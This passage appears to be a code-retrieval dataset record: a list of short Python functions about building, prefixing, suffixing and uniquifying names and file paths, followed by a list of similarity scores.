'...':\n self.logger.debug( \"Abbreviated reference {!r}\".format(name) )\n return None # first occurance is a forward reference using an abbreviation\n if nm not in self.named:\n self.named[nm]= []\n self.logger.debug( \"Adding empty chunk {!r}\".format(name) )\n return nm", "def update_name(self,name=None,plan_id=None):\n self.names[plan_id].append(name)", "def updatePreview(self, baseName, *args):\n\n prefix = str(self.prefix.text())\n suffix = str(self.suffix.text())\n\n string = \"\"\n if len(prefix) > 0:\n string += prefix + \"_\"\n\n string += baseName\n\n if len(suffix) > 0:\n string += \"_\" + suffix\n\n self.previewName.setText(string)", "def add(variable, value):\n prefixes[variable] = value", "def get_rep_name(self, name):\n return \"r{0}\".format(name)", "def expr_ext(self, rule_name, method):\n expr = Expression([Prefix([Suffix([Name([rule_name])])])])\n if method == \"prepend\":\n self.children.insert(0, expr)\n elif method == \"append\":\n self.children.append(expr)\n else: assert False, \"Method of extension not supported: '{0}'\".format(method)", "def add_key(self, prefix, suffix):\n if prefix in self:\n self[prefix].append(suffix)\n else:\n self[prefix] = [suffix]", "def name(prefix = 'tmp'):\n nameidx = context.curr().setdefault('NAME_INDEX', {})\n idx = nameidx.setdefault(prefix, 0)\n name = '_%s_%d' % (prefix, idx)\n nameidx[prefix] = idx + 1\n return name", "def add(self, name):\n\n # no need to add first_name while adding full_name\n name_list = name.strip().split()[1:]\n name_list.append(name)\n for item in set(name_list):\n node = self.root\n # check for every char in word, i.e. 
check whether is it in trie\n # if yes, then move forward over that path\n # else, add node with given char\n for char in item.lower():\n if char not in node:\n node[char] = {}\n node = node[char]\n\n if \"NAME\" in node:\n node[\"NAME\"].append(name)\n else:\n node[\"NAME\"] = [name]", "def start_name(self, attributes):\n self.name = True", "def _generate_new_prefix(current_prefix, class_name):\n return (\n \"_\".join((current_prefix, class_name)).upper()\n if current_prefix\n else class_name.upper()\n )", "def uniquify_name(self):\n self.name = f'{self.get_name()}_{len(self.store.get_user_functions())}'", "def set_postfix_arg(self, name, value):\n self._postfix_kwargs[name] = value", "def make_new_path(path, postfix = \"\", ext = \"\"):\n dir = os.path.split(path)[0]\n old_basename, old_ext = os.path.splitext(path)\n new_basename = old_basename + \"_\" + postfix\n new_path = os.path.join(dir, new_basename + \".\" + ext)\n return new_path", "def name(self, new_name: str) -> None:\n raise NotImplementedError()", "def create_extended_name(y: str, p: str) -> str:\n final_letter = y[-1]\n if final_letter == \"e\":\n extended_name = y + \"x\" + p\n elif final_letter in [\"a\", \"i\", \"o\", \"u\"]:\n extended_name = y[:-1] + \"ex\" + p\n elif final_letter == \"x\":\n if y[-2] == \"e\":\n extended_name = y + p\n else:\n extended_name = y + \"ex\" + p\n return extended_name", "def create_new_name(self, file_name):\n new_name = file_name\n index = 0\n while new_name in self.used_names:\n new_name = file_name + \"-\" + str(index)\n index += 1\n return new_name", "def name(self, name):\n pass", "def write_name(self, name):\n attr = self.get_attr(Name)\n attr.write(name)", "def set_name(self, newname=\"\"):\n self.name = newname", "def _build_name(name_id):\n return \"xp_%08d\" % name_id", "def _implicitNameOp(self, prefix, name):\n suffix = 'FAST' if self._optimized() else 'NAME'\n self.emit('%s_%s' % (prefix, suffix), name)", "def addName(self, dict, name, value):\n dict[name] = value", "def printname(bruce):", "def replace(self, name, *args):\n\n self._add(True, self.authority, name, *args)", "def generate_rename_direct(self, prefix):\n return \"#define %s%s %s\" % (prefix, self.__name, self.__rename)", "def smart_add(\n name = None,\n due_date = None,\n priority = None,\n tags = None,\n repeat = None,\n estimated = None,\n):\n\n smart = [re.sub(r'(^| )([@^!#*=])', r'\\1\\\\\\2', name)]\n\n if due_date:\n smart.append('^' + due_date)\n\n if priority:\n smart.append('!' 
+ str(priority))\n\n if tags:\n smart.extend(['#' + t for t in tags])\n\n if repeat:\n smart.append('*' + repeat)\n\n if estimated:\n smart.append('=' + estimated)\n\n return ' '.join(smart)", "def visit_name(self, node, children):\n name = ''.join(children)\n return name", "def fullname(self, name):\n\n first, last = name.split(' ')\n self.first = first\n self.last = last", "def increment_name(name: str) -> str:\n\n match = _number_suffix.search(name)\n if match:\n number_str = match.group(1)\n next_number = int(number_str) + 1\n return f'{name[:-len(number_str)]}{next_number}'\n else:\n return f'{name}-1'", "def create_name(name, epochs, lr, lr_decay_step, dilation, batch_size):\n\treturn '{}_ep-{}_lr-{}_de-{}_di-{}_bs-{}'.format(name, epochs, lr, lr_decay_step, sum(dilation), batch_size)", "def add_suffix_to_filename(filename, suffix):\n name, ext = os.path.splitext(filename)\n return ''.join([name, suffix, ext])", "def octopus_names(self, msg, args):\r\n self.names.send_names(msg, args)", "def name_expand(name):\n\n m = re.search('G(\\d\\d\\d\\.\\d|\\d\\d\\.\\d|\\d\\.\\d)([+-])(\\d\\d\\.\\d|\\d\\.\\d)',\n name)\n\n lon = m.group(1)\n sig = m.group(2)\n lat = m.group(3)\n\n new_lon = (5-len(lon))*'0'+lon\n new_lat = (4-len(lat))*'0'+lat\n\n new_name = 'G'+new_lon+sig+new_lat\n\n return new_name", "def _uniquify_name(self, name, callable):\n while True:\n try:\n callable(name)\n name += u'_'\n except:\n break\n return name", "def append_to_filename(filepath: str, name_suffix: str, new_ext: Optional[str] = None) -> str:\n ext = new_ext or filepath_ext(filepath)\n name = filepath_name_only(filepath)\n return str(pathlib.Path(filepath).with_name(name+name_suffix).with_suffix(ext))", "def create_dns_name ( base_name, name ) :\n return create_r53_name( base_name, name) + '.mse-esp.com'", "def update_name(self, new_name):\r\n self.__name = new_name", "def update_name(self, new_name):\r\n self.__name = new_name", "def name(self, value):\n self._name = c(value)", "def get_name(self):\n return '.'.join(self.name)", "def addNamed( self, chunk ):\n self.chunkSeq.append( chunk )\n chunk.web= weakref.ref(self)\n nm= self.addDefName( chunk.name )\n if nm:\n # We found the full name for this chunk\n self.sequence += 1\n chunk.seq= self.sequence\n chunk.fullName= nm\n self.named[nm].append( chunk )\n chunk.initial= len(self.named[nm]) == 1\n self.logger.debug( \"Extending chunk {!r} from {!r}\".format(nm, chunk.name) )\n else:\n raise Error(\"No full name for {!r}\".format(chunk.name), chunk)", "def construct_name(p, prefix):\n name = prefix\n for key in p.keys():\n if (type(p[key]) != tuple) and (type(p[key]) != list):\n name = name + '_' + str(key) + '-' + str(p[key])\n else:\n name = name + '_' + str(key) + '-' + str(p[key][0])\n return name", "def makepaddedname(match):\n\n prefix = match.string[:match.start()]\n suffix = match.string[match.end():]\n padding = \"%%0%dd\" % (match.end() - match.start())\n template = prefix + padding + suffix\n return match.expand(template)", "def feed(self, entry):\r\n if entry.name not in self.names:\r\n self.names[entry.name] = list()\r\n self.names[entry.name].append(entry)", "def get_new_name(attrs: Dict[str, str],\n mark_name: str = '',\n name_map: Optional[Dict[str, str]] = None) -> str:\n if 'name' in attrs:\n new_name = attrs['name']\n else:\n new_name = '_'.join((attrs['func'], attrs['type'], str(attrs['id'])))\n\n if name_map is not None:\n if new_name in name_map:\n return name_map[new_name]\n\n if f'{mark_name}:{new_name}' in name_map:\n return 
name_map[f'{mark_name}:{new_name}']\n\n return new_name", "def add_names(self, *sNames):\n self.names += list(sNames)", "def print_name(name):\n print(\"Hello \"+ str(name))", "def AddName(self, name):\n self.__names.append(name)\n self.Modified()", "def group_add_name(org_id, data):\n if data.has_key('groupname'):\n groupname = data['groupname']\n add_group(org_id, groupname, False)", "def pack_name(name, prefix_length=0):\n name = str(name)\n if len(name) > 63 - prefix_length:\n hash = base64.b64encode(hashlib.md5(name.encode()).digest()).decode(\n ).rstrip('=')\n name = name[:prefix_length] + hash + ':' + name[-(\n 63 - prefix_length - 1 - len(hash)):]\n return name", "def get_name():", "def add(self, name):\n self.update(name)\n\n with open(os.path.join(self.attemptdir(name), 'new'), 'w+') as f:\n pass", "def series_add_prefix(series, prefix):\n f = partial(\"{prefix}{}\".format, prefix=prefix)\n\n return series.rename(index=f)", "def prefix(self, prefix, *args):\n new_prefix = '%s%s' % (self.prefixes[-1], prefix % args)\n self.prefixes.append(new_prefix)\n try:\n yield\n finally:\n assert self.prefixes.pop() == new_prefix", "def enter_name(self, name):\n self.name = name", "def _name_increment_revision(name):\n revre = r\"^(.*?)([0-9]+)$\"\n m = re.search(revre, name)\n if m:\n name = m.group(1) + str(int(m.group(2)) + 1)\n else:\n name = name + \" (copy)\"\n return name", "def createkey(*args): # {{{2\n return '-'.join(map(simplifyname, args))", "def namestr(self, sep: str = \", \", with_prefix: bool = True) -> str:\n names: list = [\n \"POSITIONAL\"\n if name == POSITIONAL\n else self._prefix_name(name)\n if with_prefix\n else name\n for name in sorted(self.names, key=len)\n ]\n return sep.join(names)", "def success_new_brass(name):\n return 'Nom de brasserie %s' % name + ' a bien ete ajoute'", "def AddStringPrefixOrSuffixToSelected(rig, insert_text, is_suffix):\n\n hierarchy_mod = rig.get_hierarchy_modifier()\n selection = hierarchy_mod.get_selection()\n\n if not selection:\n\n return\n\n for item in selection:\n\n src_name = str(item.get_editor_property(\"name\"))\n\n new_name = \"{0}_{1}\".format(insert_text, src_name)\n\n if is_suffix:\n \n new_name = \"{0}_{1}\".format(src_name, insert_text)\n\n hierarchy_mod.rename_element(item, new_name)", "def _transformed_name(key: Text) -> Text:\n return key + \"_xf\"", "def on_path(self, new):\n self.name = basename(new)", "def visit_Name(self, node):\n if isinstance(node.ctx, gast.Param) and node.id != \"self\":\n node.id += '_new'\n\n return node", "def generate_name(path_list):\n name = path_list[0]\n for item in path_list[1:]:\n name += \"[\" + item + \"]\"\n return name", "def increment_filename(self, filename, path=\"\", insert=\"\"):\n path = path.strip(\"/\")\n basename, ext = os.path.splitext(filename)\n for i in itertools.count():\n if i:\n insert_i = \"{}{}\".format(insert, i)\n else:\n insert_i = \"\"\n name = \"{basename}{insert}{ext}\".format(\n basename=basename, insert=insert_i, ext=ext\n )\n if not self.exists(\"{}/{}\".format(path, name)):\n break\n return name", "def prepend_to(self, key, entry):\n try:\n tail = os.path.pathsep + self[key]\n except KeyError:\n tail = \"\"\n self[key] = entry + tail" ]
[ "0.6697877", "0.662184", "0.6614897", "0.6473923", "0.6254014", "0.6248267", "0.6226696", "0.6212746", "0.62123245", "0.60669625", "0.6044965", "0.6044965", "0.6044435", "0.60033596", "0.5903342", "0.5898558", "0.588601", "0.5874177", "0.5855147", "0.58351374", "0.5803622", "0.5779463", "0.57719445", "0.57650536", "0.5749083", "0.57302135", "0.57257324", "0.57250845", "0.5724131", "0.5718624", "0.5712759", "0.5706087", "0.57048386", "0.5701772", "0.569791", "0.5694129", "0.5643821", "0.5643318", "0.56427133", "0.56324565", "0.5629263", "0.56179166", "0.5604659", "0.5600315", "0.5597865", "0.5591785", "0.55641514", "0.5562165", "0.5559544", "0.5554915", "0.5550336", "0.5549979", "0.5539963", "0.55377525", "0.55374813", "0.55327666", "0.5529383", "0.5523319", "0.5517398", "0.55140334", "0.55047923", "0.5504496", "0.549815", "0.549603", "0.5479796", "0.546021", "0.5453427", "0.5452819", "0.5446834", "0.54446125", "0.5438981", "0.5438981", "0.5436991", "0.5436929", "0.54369044", "0.542865", "0.5426084", "0.54140276", "0.54072374", "0.5397477", "0.5392492", "0.5387937", "0.5387488", "0.5386454", "0.53832465", "0.5374284", "0.5373094", "0.536267", "0.5362483", "0.53576404", "0.5356834", "0.53546906", "0.53490096", "0.53380126", "0.5337672", "0.53357655", "0.5334321", "0.5330996", "0.5330672", "0.53150934" ]
0.8279311
0
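A minimal usage sketch of the append_name document above; the call sites are illustrative, not part of the record:

# append_name joins name and postfix with '_', with two edge cases (hypothetical calls)
assert append_name(None, 'bn') is None          # a None name passes through unchanged
assert append_name('', 'bn') == 'bn'            # an empty name yields just the postfix
assert append_name('conv1', 'bn') == 'conv1_bn' # the common case: '<name>_<postfix>'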
Lands the rover, and makes it part of the grid. Throws an exception if: a rover with that name already exists; the rover being landed has a bad direction; the rover's coordinates are off the grid; a rover already exists on the grid at the rover's coordinates
def land_rover(self, rover): if self.rovers.get(rover.name): raise RoverException(ExceptionMessages.ROVER_ALREADY_LANDED) if not Rover.valid_direction(rover.direction): raise RoverException(ExceptionMessages.BAD_DIRECTION) if not self._is_coordinate_in_the_grid(rover.coordinate): raise RoverException(ExceptionMessages.OFF_GRID) if self._is_coordinate_occupied(rover.coordinate): raise RoverException(ExceptionMessages.ROVER_COLLISION) self.rovers[rover.name] = rover
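A sketch of how land_rover's failure modes could be exercised; the Grid and Rover constructors below are assumptions about the surrounding code, not part of this record:

# Hypothetical driver; Grid(5, 5) and the Rover(...) signature are assumed for illustration
grid = Grid(5, 5)
grid.land_rover(Rover(name='r1', coordinate=(1, 2), direction='N'))  # lands successfully
try:
    # same name again: raises with ExceptionMessages.ROVER_ALREADY_LANDED
    grid.land_rover(Rover(name='r1', coordinate=(0, 0), direction='N'))
except RoverException as exc:
    print(exc)
try:
    # same coordinate as r1: raises with ExceptionMessages.ROVER_COLLISION
    grid.land_rover(Rover(name='r2', coordinate=(1, 2), direction='E'))
except RoverException as exc:
    print(exc)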
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_move(self):\n self.owner = self.game.current_turn\n self.status = 'X' if self.owner == self.game.creator else 'O'\n ####\n #Random turn??\n ####\n self.save(update_fields=['status', 'owner'])\n\n # Add log entry for move\n self.game.add_log(f'cell made at ({self.row}, {self.col}) by {self.owner}')\n\n # Set the current turn for the other player if game is not over\n # Check if find winner\n if self.game.check_win(cell=self) or\\\n self.game.get_all_game_cells().filter(status='EMPTY').count() == 0:\n print(\"Winnnnnnnn\")\n self.game.mark_complete(winner=self.owner)\n\n # Switch player turn\n self.game.switch_turn()\n\n # Let the game know about the move and result\n self.send_game_update()", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #provjere da li su kraljevi ili topovi inicirali pomijeranje\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #provjera da li je neko pojeo topove\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def make_move(self, playername, coordinates, direction):\n\n pass", "def place_pillar_e(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_e = x, y\r\n if self.pillar_e_room() == self.pillar_a_room() or \\\r\n self.pillar_e_room() == self.pillar_i_room() or \\\r\n self.pillar_e_room() == self.pillar_p_room() or \\\r\n self.pillar_e_room() == self.entrance_room() or \\\r\n self.pillar_e_room() == self.exit_room():\r\n return self.place_pillar_e()\r\n self.__maze[x][y].set_pillar_e(True)", "def place_road(self, road):\n\n # Check if space is empty\n if not self.environment.grid.is_cell_empty(road.pos):\n return False\n\n # Place Road\n self.environment.grid.place_agent(agent=road, pos=road.pos)\n\n # Add road to environment's road list\n self.environment.agents['roads'].append(road)\n\n # Update the list of cells where other things can be built\n self.update_available_cells(road)", "def process_rover(grid, start_at, instructions, name='rover'):\n plateu = None\n try:\n if isinstance(grid, str):\n x_end, y_end = grid.split(' ')\n x_end = int(x_end)\n y_end = int(y_end)\n plateu = Plateu(x_end, y_end, name)\n\n elif isinstance(grid, Plateu):\n plateu = grid\n\n else:\n raise ValueError(\"'grid' must be of type str or Plateu.\")\n\n except Exception as e:\n # Error handling code here for plateu here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n try:\n x, y, f = start_at.split(' ')\n x = int(x)\n y = int(y)\n rover = Rover(x, y, f, plateu, name)\n for i in range(len(instructions)):\n rover.position_rover(instructions[i])\n # Leaving this in comments for later debugging.\n # print(instructions[i] +\n # repr(rover.position_rover(instructions[i])))\n\n except Exception as e:\n # Error handling code here for rover here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n print(rover.get_position())\n return rover", "def path(self):\n\n path_direction = random.randrange(1, 6)\n 
# print(path_direction)\n\n # if current room is on the edge of the level (column 0 or column 4 and we did not drop to that room\n # because of hitting an edge in the previous assignment, assign the current room to be of type 2 and the\n # new room above it to be of type 3 so that the rooms connect\n if self.current_room_y in (0, 4) and self.edge_row_jump is False:\n self.room_type[self.current_room_x][self.current_room_y] = 3\n self.current_room_x += 1\n # if we are at the bottom of level and attempt to go down again, we will have found our start room. In this\n # we save the parameter and exit the loop\n if self.current_room_x > 4:\n self.room_type[self.current_room_x - 1][self.current_room_y] = 4\n self.start_room['row'] = self.current_room_x - 1\n self.start_room['column'] = self.current_room_y\n return True\n self.room_type[self.current_room_x][self.current_room_y] = 2\n # this is set to true so that we don't continue jumping up the side of the level\n self.edge_row_jump = True\n self.number_of_rooms += 1\n\n # if random number is 1 or 2 we move the path left and give that new room left/right exits\n elif path_direction in (1, 2):\n\n # if we are on the left edge of level then we shouldn't move left any further\n # if cell we are moving to has already been assigned then we should not move there either\n if self.current_room_y > 0 and self.room_type[self.current_room_x][self.current_room_y - 1] is 0:\n # we now have a new direction without jumping rows because of hitting an edge\n self.edge_row_jump = False\n # move current room to the left\n self.current_room_y -= 1\n # assign that room with a left/right exit\n self.room_type[self.current_room_x][self.current_room_y] = 1\n self.number_of_rooms += 1\n\n # if random number is 3 or 4 we move right and give that new room left/right exits\n elif path_direction in (3, 4):\n # check if the room we are moving to has already been assigned or is off the screen\n if self.current_room_y < 4 and self.room_type[self.current_room_x][self.current_room_y + 1] == 0:\n # we now have a new direction without jumping rows because of hitting an edge\n self.edge_row_jump = False\n # move current room to the right\n self.current_room_y += 1\n # assign that room with a left/right exit\n self.room_type[self.current_room_x][self.current_room_y] = 1\n self.number_of_rooms += 1\n\n # if random number is 5 then we are moving down\n elif self.number_of_rooms != 0 and path_direction is 5:\n self.edge_row_jump = False\n self.room_type[self.current_room_x][self.current_room_y] = 3\n # print cell to screen\n self.current_room_x += 1\n # if we are at bottom of level and attempt to go down again, we will have found our start room. 
In this\n # we save the parameter and exit the loop\n if self.current_room_x > 4:\n self.room_type[self.current_room_x - 1][self.current_room_y] = 4\n self.start_room['row'] = self.current_room_x - 1\n self.start_room['column'] = self.current_room_y\n return True\n self.room_type[self.current_room_x][self.current_room_y] = 2\n self.number_of_rooms += 1\n\n # print array to see if movements are correct\n # for row in self.room_type:\n # print(row)\n return False", "def test_human_cannot_move_through_grid_wall(mock_random):\n mock_random.randint.return_value = 0\n human = Human()\n\n coordinates = [0, 0]\n dimensions = [4, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n assert new_coordinates == [0, 0]", "def place_entrance(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__current_room = x, y # places adventurer in dungeon at start of game\r\n self.__entrance_room = x, y\r\n self.__maze[x][y].set_entrance(True)", "def test_rover_position(self):\n rover = Rover(self.plateau_dimensions, self.rover_initial_position, Rover.DIRECTIONS.get('E'))\n rover.execute_instructions(\"LMLM\")\n self.assertEqual(rover._position.x, 1)\n self.assertEqual(rover._position.y, 2)\n self.assertEqual(rover.get_heading, 'W')", "def make_move(self): \n if self.counter == 0:\n #AI makes a random move to start\n ai_move = random.randrange(0,((self.size[0] * self.size[1]) - 1)) \n \n #Number to coordinate conversion\n row = ai_move % self.size[0]\n column = ai_move % self.size[0]\n self.start_game((row, column))\n self.counter = 1\n\n if (self.board[(row, column)] == 'm'):\n #print() \"\\n\", \"First move RIP!, what are the odds...\"\n self.found_mine()\n self.gameover = 1\n \n else:\n row, column = self.find_move()\n \n #0.25 second wait \n #time.sleep(0.25)\n\n #Prints out to the terminal the move and type of move\n print(row, \",\", column)\n\n #Updates the GUI\n root.update()\n \n if (self.board[(row, column)] == 'm'):\n print(\"RIP!\") \n self.found_mine() \n self.gameover = 1\n \n elif self.board[(row, column)] == '0':\n print(\"No mines in sight\") \n self.found_space((row, column))\n\n elif self.board[(row, column)] == '1':\n print(\"There is 1 mine next to this spot\") \n self.found_border((row, column))\n else:\n print(\"There are\", self.board[(row, column)], \"mines next to this spot\") \n self.found_border((row, column))", "def roof(self, x, y, z, width=10, length=10, height=10, details=None, name=\"wall\", mergeshape=None, makeroof=True, makeceiling=True):\r\n global wallnum\r\n\r\n roof = SolidObject(name+str(wallnum), Size(length, 1, width), Position(x, y+height+self.ceilingthickness / 2, z), 0)\r\n self.walls.append(roof)\r\n roofmodel = Plane(w=length, h=width, name=name+str(wallnum))\r\n mergeshape.add(roofmodel,x,y+height+self.ceilingthickness,z,rx=90.0,ry=0.0,rz=0.0)\r\n\r\n wallnum += 1", "def __init__(self, _filename):\n # -- open text file containing maze\n self.file = open(_filename, 'r')\n self._grid = []\n # -- initialize line_list and append into list\n line_list = []\n lines = self.file.readlines()\n for line in lines:\n line = line.strip('\\n')\n line_list = [char for char in line]\n self._grid.append(line_list)\n # -- placing the player at the very start\n self._player = Player(1,2)\n self._grid[self._player._x][self._player._y] = POINT_OF_PLAYER\n self._grid[3][-1] = POINT_OF_EXIT\n \n \n\n # --- Rename the check method to can_move_to\n \"\"\" \n :return: return False if the location is a wall, otherwise return True\n 
:rtype: bool\n \"\"\"", "def create_neighborhood(self):\n if len(self.available_building_cells) == 0:\n return False\n # Pick cell\n shuffle(self.available_building_cells)\n\n neighborhood_origin = self.available_building_cells[0]\n if not self.creates_valid_building(neighborhood_origin):\n # If not a valid placement, remove location from list\n self.available_building_cells.remove(neighborhood_origin)\n # Retry!\n self.create_neighborhood()\n return True # Exit after neighborhood is created\n\n final_cells = [neighborhood_origin]\n self.available_building_cells.remove(neighborhood_origin)\n\n # Place building on origin\n self.place_building(Building(self.environment, self.environment.next_building_id, neighborhood_origin, attractiveness=random()))\n neighborhood_cells = self.environment.grid.get_neighborhood(neighborhood_origin, moore=True, include_center=True)\n\n # Create a random number of residence buildings in this neighborhood\n number_of_residences = randrange(2,6)\n for i in range(number_of_residences):\n while len(neighborhood_cells) > 0:\n shuffle(neighborhood_cells)\n # Only place building if space is empty\n if self.environment.grid.is_cell_empty(neighborhood_cells[0]):\n self.place_building(Building(self.environment, self.environment.next_building_id, neighborhood_cells[0], attractiveness=random()))\n final_cells.append(neighborhood_cells[0])\n try:\n # If this space was available before, remove it from list\n self.available_building_cells.remove(neighborhood_cells[0])\n except:\n pass\n\n continue\n\n # Remove cell from list\n neighborhood_cells.remove(neighborhood_cells[0])\n\n # Fill surrounding space around buildings with roads!\n for building_location in final_cells:\n for surrounding_cell in self.environment.grid.get_neighborhood(building_location, moore=True):\n if self.environment.grid.is_cell_empty(surrounding_cell):\n self.place_road(Road(surrounding_cell))\n\n return True", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.minimax(self, sample_space, affinity, depth_limit, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def make_swivelknife_move(self):\n offset = self.shape.parentLayer.getToolRadius()\n drag_angle = self.shape.drag_angle\n\n startnorm = offset*Point(1, 0) # TODO make knife direction a config setting\n prvend, prvnorm = Point(), Point()\n first = True\n\n for geo in self.shape.geos.abs_iter():\n if isinstance(geo, LineGeo):\n geo_b = deepcopy(geo)\n if first:\n first = False\n prvend = geo_b.Ps + startnorm\n prvnorm = startnorm\n norm = offset * (geo_b.Pe - geo_b.Ps).unit_vector()\n geo_b.Ps += norm\n geo_b.Pe += norm\n if not prvnorm == norm:\n direction = prvnorm.to3D().cross_product(norm.to3D()).z\n swivel = ArcGeo(Ps=prvend, Pe=geo_b.Ps, r=offset, direction=direction)\n swivel.drag = drag_angle < abs(swivel.ext)\n self.append(swivel)\n self.append(geo_b)\n\n prvend = geo_b.Pe\n prvnorm = norm\n elif isinstance(geo, ArcGeo):\n geo_b = deepcopy(geo)\n if first:\n first = False\n prvend = geo_b.Ps + startnorm\n prvnorm = startnorm\n if geo_b.ext > 0.0:\n norma = offset*Point(cos(geo_b.s_ang+pi/2), sin(geo_b.s_ang+pi/2))\n norme = Point(cos(geo_b.e_ang+pi/2), 
sin(geo_b.e_ang+pi/2))\n else:\n norma = offset*Point(cos(geo_b.s_ang-pi/2), sin(geo_b.s_ang-pi/2))\n norme = Point(cos(geo_b.e_ang-pi/2), sin(geo_b.e_ang-pi/2))\n geo_b.Ps += norma\n if norme.x > 0:\n geo_b.Pe = Point(geo_b.Pe.x+offset/(sqrt(1+(norme.y/norme.x)**2)),\n geo_b.Pe.y+(offset*norme.y/norme.x)/(sqrt(1+(norme.y/norme.x)**2)))\n elif norme.x == 0:\n geo_b.Pe = Point(geo_b.Pe.x,\n geo_b.Pe.y)\n else:\n geo_b.Pe = Point(geo_b.Pe.x-offset/(sqrt(1+(norme.y/norme.x)**2)),\n geo_b.Pe.y-(offset*norme.y/norme.x)/(sqrt(1+(norme.y/norme.x)**2)))\n if prvnorm != norma:\n direction = prvnorm.to3D().cross_product(norma.to3D()).z\n swivel = ArcGeo(Ps=prvend, Pe=geo_b.Ps, r=offset, direction=direction)\n swivel.drag = drag_angle < abs(swivel.ext)\n self.append(swivel)\n prvend = geo_b.Pe\n prvnorm = offset*norme\n if -pi < geo_b.ext < pi:\n self.append(ArcGeo(Ps=geo_b.Ps, Pe=geo_b.Pe, r=sqrt(geo_b.r**2+offset**2), direction=geo_b.ext))\n else:\n geo_b = ArcGeo(Ps=geo_b.Ps, Pe=geo_b.Pe, r=sqrt(geo_b.r**2+offset**2), direction=-geo_b.ext)\n geo_b.ext = -geo_b.ext\n self.append(geo_b)\n # TODO support different geos, or disable them in the GUI\n # else:\n # self.append(copy(geo))\n if not prvnorm == startnorm:\n direction = prvnorm.to3D().cross_product(startnorm.to3D()).z\n self.append(ArcGeo(Ps=prvend, Pe=prvend-prvnorm+startnorm, r=offset, direction=direction))\n\n self.geos.insert(0, RapidPos(self.geos.abs_el(0).Ps))\n self.geos[0].make_abs_geo()", "async def land(self, msg, distance):\n\t\tself.tile[self.p] += distance\n\t\tif self.tile[self.p] >= 40: #past go\n\t\t\tself.tile[self.p] -= 40\n\t\t\tdoDoubleGo = await self.cog.config.guild(self.ctx.guild).doDoubleGo()\n\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\tif self.tile[self.p] == 0 and doDoubleGo:\n\t\t\t\tadd = goValue * 2\n\t\t\telse:\n\t\t\t\tadd = goValue\n\t\t\tself.bal[self.p] += add\n\t\t\tmsg += (\n\t\t\t\tf'You {\"landed on\" if self.tile[self.p] == 0 else \"passed\"} go, +${add}! '\n\t\t\t\tf'You now have ${self.bal[self.p]}.\\n'\n\t\t\t)\n\t\tmsg += f'You landed at {TILENAME[self.tile[self.p]]}.\\n'\n\t\tif self.ownedby[self.tile[self.p]] == self.p: #player is owner\n\t\t\tmsg += 'You own this property already.\\n'\n\t\telif self.ismortgaged[self.tile[self.p]] == 1: #mortgaged\n\t\t\tmsg += 'It is currently mortgaged. No rent is due.\\n'\n\t\telif self.ownedby[self.tile[self.p]] == -2: #unownable\n\t\t\tif self.tile[self.p] == 0: #go\n\t\t\t\tpass #already handled when moving\n\t\t\telif self.tile[self.p] == 10: #jail\n\t\t\t\tmsg += 'Just visiting!\\n'\n\t\t\telif self.tile[self.p] == 20: #free parking\n\t\t\t\tfreeParkingValue = await self.cog.config.guild(self.ctx.guild).freeParkingValue()\n\t\t\t\tif freeParkingValue is None: #no reward\n\t\t\t\t\tpass\n\t\t\t\telif freeParkingValue == 'tax': #tax reward\n\t\t\t\t\tself.bal[self.p] += self.freeparkingsum\n\t\t\t\t\tmsg += (\n\t\t\t\t\t\tf'You earned ${self.freeparkingsum}. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\t)\n\t\t\t\t\tself.freeparkingsum = 0\n\t\t\t\telse: #hard coded reward\n\t\t\t\t\tself.bal[self.p] += freeParkingValue\n\t\t\t\t\tmsg += f'You earned ${freeParkingValue}. 
You now have ${self.bal[self.p]}.\\n'\n\t\t\telif self.tile[self.p] == 30: #go to jail\n\t\t\t\tself.injail[self.p] = True\n\t\t\t\tself.tile[self.p] = 10\n\t\t\t\tself.was_doubles = False\n\t\t\t\tmsg += 'You are now in jail!\\n'\n\t\t\telif self.tile[self.p] in (2, 17, 33): #cc\n\t\t\t\tcard = self.ccorder[self.ccn]\n\t\t\t\tmsg += f'Your card reads:\\n{CCNAME[card]}\\n'\n\t\t\t\tif card == 0:\n\t\t\t\t\tself.tile[self.p] = 0\n\t\t\t\t\tdoDoubleGo = await self.cog.config.guild(self.ctx.guild).doDoubleGo()\n\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\tif doDoubleGo:\n\t\t\t\t\t\tself.bal[self.p] += goValue * 2\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 1:\n\t\t\t\t\tself.bal[self.p] += 200\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 2:\n\t\t\t\t\tself.bal[self.p] -= 50\n\t\t\t\t\tself.freeparkingsum += 50\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 3:\n\t\t\t\t\tself.bal[self.p] += 50\n\t\t\t\t\tmsg += f'You now have 